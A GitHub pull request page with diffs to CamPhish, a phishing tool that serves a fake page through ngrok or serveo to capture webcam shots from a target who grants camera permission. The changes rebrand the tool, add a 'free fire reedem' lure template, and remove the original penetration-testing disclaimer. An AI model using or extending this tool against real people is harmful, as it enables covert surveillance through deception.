Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update the Camara hack #161

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
13 changes: 5 additions & 8 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
# CamPhish
Grab cam shots from target's phone front camera or PC webcam just sending a link.
![CamPhish](https://techchip.net/wp-content/uploads/2020/04/camphish.jpg)
![CamPhish](https://cyber aiza.net/wp-content/uploads/2020/04/camphish.jpg)

# What is CamPhish?
<p>CamPhish is techniques to take cam shots of target's phone front camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device</p>
Expand All @@ -11,6 +11,7 @@ Grab cam shots from target's phone front camera or PC webcam just sending a link
<li>Festival Wishing</li>
<li>Live YouTube TV</li>
<li>Online Meeting [Beta]</li>
<li>free fire reedem<li>
</ul>
<p>simply enter festival name or youtube's video ID</p>

Expand All @@ -30,10 +31,10 @@ Grab cam shots from target's phone front camera or PC webcam just sending a link
apt-get -y install php openssh git wget
```

## Installing (Kali Linux/Termux):
## Installing (Kali Linux/Termux📱):

```
git clone https://github.com/techchipnet/CamPhish
git clone https://github.com/cyber aiza/CamPhish
cd CamPhish
bash camphish.sh
```
Expand All @@ -44,8 +45,4 @@ bash camphish.sh
<p><b>Version: 1.4:</b> Ngrok authtoken update</p>
<p><b>Version: 1.3:</b> Fix ngrok direct link</p>

### Video Demo
[![CamPhish Update demo](https://img.youtube.com/vi/i7tvDJx3-yw/0.jpg)](https://www.youtube.com/watch?v=i7tvDJx3-yw)
#### For More Video subcribe <a href="http://youtube.com/techchipnet">TechChip YouTube Channel</a>
<p>CamPhish is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.</p>
<p>CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice</p>
MADE BY CYBER AIZA🦋
4 changes: 2 additions & 2 deletions camphish.sh
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#!/bin/bash
# CamPhish v1.5
# Powered by TechChip
# Credits goes to thelinuxchoice [github.com/thelinuxchoice/]
# Powered by Cyber🦋Aiza
# Credits goes to CYBER AMRITA [github.com/CYBER AIZA/]

trap 'printf "\n";stop' 2

Expand Down